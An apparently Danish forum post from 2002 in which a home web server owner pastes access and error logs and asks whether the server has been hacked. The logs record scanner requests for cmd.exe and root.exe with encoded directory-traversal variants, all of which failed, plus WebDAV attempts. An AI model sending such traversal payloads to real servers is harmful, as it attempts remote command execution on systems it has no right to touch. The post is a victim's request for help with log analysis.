Er jeg blevet hacket ?!?!
Hej eksperter.Faldt over noget underligt da jeg kiggede i min accesslog til min http server.
Normalt loggers der som følgende på alle der kommer ind på min hjemmeside:
80.199.20.120 - - [22/Dec/2002:21:25:58 +0100] "GET / HTTP/1.1" 304 0 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705)"
80.199.20.120 - - [22/Dec/2002:21:25:58 +0100] "GET /Top_mainpage.htm HTTP/1.1" 304 0 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705)"
80.199.20.120 - - [22/Dec/2002:21:25:58 +0100] "GET /Mainframe_mainpage.htm HTTP/1.1" 304 0 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705)"
80.199.20.120 - - [22/Dec/2002:21:25:58 +0100] "GET /Menu_mainpage.htm HTTP/1.1" 304 0 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705)"
80.199.20.120 - - [22/Dec/2002:21:25:58 +0100] "GET /Top_mainpage.htm?reload HTTP/1.1" 304 0 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705)"
80.199.20.120 - - [22/Dec/2002:21:25:58 +0100] "GET /Mainframe_mainpage.htm?reload HTTP/1.1" 304 0 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705)"
80.199.20.120 - - [22/Dec/2002:21:25:59 +0100] "GET /Menu_mainpage.htm?reload HTTP/1.1" 304 0 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705)"
Også er man ligesom på hovedsiden...
Men der er een IP der laver det her:
80.199.144.94 - - [22/Dec/2002:15:01:11 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
80.199.144.94 - - [22/Dec/2002:15:01:12 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
80.199.144.94 - - [22/Dec/2002:15:01:14 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
80.199.144.94 - - [22/Dec/2002:15:01:16 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
80.199.144.94 - - [22/Dec/2002:15:01:17 +0100] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
80.199.144.94 - - [22/Dec/2002:15:01:20 +0100] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
80.199.144.94 - - [22/Dec/2002:15:01:21 +0100] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
80.199.144.94 - - [22/Dec/2002:15:01:23 +0100] "GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
80.199.144.94 - - [22/Dec/2002:15:01:25 +0100] "GET /scripts/..Á../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
80.199.144.94 - - [22/Dec/2002:15:01:27 +0100] "GET /scripts/..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
80.199.144.94 - - [22/Dec/2002:15:01:27 +0100] "GET /scripts/..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
80.199.144.94 - - [22/Dec/2002:15:01:29 +0100] "GET /scripts/..Áœ../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
80.199.144.94 - - [22/Dec/2002:15:01:30 +0100] "GET /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
80.199.144.94 - - [22/Dec/2002:15:01:31 +0100] "GET /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
80.199.144.94 - - [22/Dec/2002:15:01:32 +0100] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
80.199.144.94 - - [22/Dec/2002:15:01:33 +0100] "GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
Det er sket to gange fra samme IP.
Kigger jeg i selve serverloggen, står der det her: (Bemærk IP'en der går igen 80.199.144.94 og en IP der ikke figurerer i access loggen 217.81.215.130)
[22/Dec/2002:02:50:44 +0100] HTTP [217.81.215.130]: Invalid URL name (.. not allowed)
[22/Dec/2002:02:50:48 +0100] HTTP [217.81.215.130]: Invalid URL name (.. not allowed)
[22/Dec/2002:02:50:53 +0100] HTTP [217.81.215.130]: Invalid URL name (.. not allowed)
[22/Dec/2002:02:50:57 +0100] HTTP [217.81.215.130]: Invalid URL name (.. not allowed)
[22/Dec/2002:02:51:02 +0100] HTTP [217.81.215.130]: Invalid URL name (.. not allowed)
[22/Dec/2002:02:51:06 +0100] HTTP [217.81.215.130]: Invalid URL name (.. not allowed)
[22/Dec/2002:02:51:11 +0100] HTTP [217.81.215.130]: Invalid URL name (.. not allowed)
[22/Dec/2002:02:51:15 +0100] HTTP [217.81.215.130]: Invalid URL name (.. not allowed)
[22/Dec/2002:02:51:19 +0100] HTTP [217.81.215.130]: Invalid URL name (.. not allowed)
[22/Dec/2002:02:51:23 +0100] HTTP [217.81.215.130]: Invalid URL name (.. not allowed)
[22/Dec/2002:02:51:26 +0100] HTTP [217.81.215.130]: Invalid URL name (.. not allowed)
[22/Dec/2002:02:51:30 +0100] HTTP [217.81.215.130]: Invalid URL name (.. not allowed)
[22/Dec/2002:15:01:17 +0100] HTTP [80.199.144.94]: Invalid URL name (.. not allowed)
[22/Dec/2002:15:01:20 +0100] HTTP [80.199.144.94]: Invalid URL name (.. not allowed)
[22/Dec/2002:15:01:21 +0100] HTTP [80.199.144.94]: Invalid URL name (.. not allowed)
[22/Dec/2002:15:01:23 +0100] HTTP [80.199.144.94]: Invalid URL name (.. not allowed)
[22/Dec/2002:15:01:25 +0100] HTTP [80.199.144.94]: Invalid URL name (.. not allowed)
[22/Dec/2002:15:01:27 +0100] HTTP [80.199.144.94]: Invalid URL name (.. not allowed)
[22/Dec/2002:15:01:27 +0100] HTTP [80.199.144.94]: Invalid URL name (.. not allowed)
[22/Dec/2002:15:01:29 +0100] HTTP [80.199.144.94]: Invalid URL name (.. not allowed)
[22/Dec/2002:15:01:30 +0100] HTTP [80.199.144.94]: Invalid URL name (.. not allowed)
[22/Dec/2002:15:01:31 +0100] HTTP [80.199.144.94]: Invalid URL name (.. not allowed)
[22/Dec/2002:15:01:32 +0100] HTTP [80.199.144.94]: Invalid URL name (.. not allowed)
[22/Dec/2002:15:01:33 +0100] HTTP [80.199.144.94]: Invalid URL name (.. not allowed)
[22/Dec/2002:20:54:52 +0100] Client '217.157.182.160' attempted WebDAV request (not enabled)
[22/Dec/2002:20:54:52 +0100] Client '217.157.182.160' attempted WebDAV request (not enabled)
[22/Dec/2002:20:54:53 +0100] Client '217.157.182.160' attempted WebDAV request (not enabled)
[22/Dec/2002:20:54:53 +0100] Client '217.157.182.160' attempted WebDAV request (not enabled)
[22/Dec/2002:20:54:54 +0100] Client '217.157.182.160' attempted WebDAV request (not enabled)
[22/Dec/2002:20:54:54 +0100] Client '217.157.182.160' attempted WebDAV request (not enabled)
[22/Dec/2002:20:54:55 +0100] Client '217.157.182.160' attempted WebDAV request (not enabled)
[22/Dec/2002:20:54:55 +0100] Client '217.157.182.160' attempted WebDAV request (not enabled)
[22/Dec/2002:20:56:50 +0100] Client '217.157.182.160' attempted WebDAV request (not enabled)
[22/Dec/2002:20:56:50 +0100] Client '217.157.182.160' attempted WebDAV request (not enabled)
[22/Dec/2002:20:56:51 +0100] Client '217.157.182.160' attempted WebDAV request (not enabled)
[22/Dec/2002:20:56:51 +0100] Client '217.157.182.160' attempted WebDAV request (not enabled)
[22/Dec/2002:20:56:52 +0100] Client '217.157.182.160' attempted WebDAV request (not enabled)
[22/Dec/2002:20:56:53 +0100] Client '217.157.182.160' attempted WebDAV request (not enabled)
[22/Dec/2002:20:58:02 +0100] Client '217.157.182.160' attempted WebDAV request (not enabled)
[22/Dec/2002:20:58:13 +0100] Client '217.157.182.160' attempted WebDAV request (not enabled)
Kan nogen fortælle mig hvad der er forgået her !?!?!?
Ved ikke om jeg skal være nervøs eller hvad..
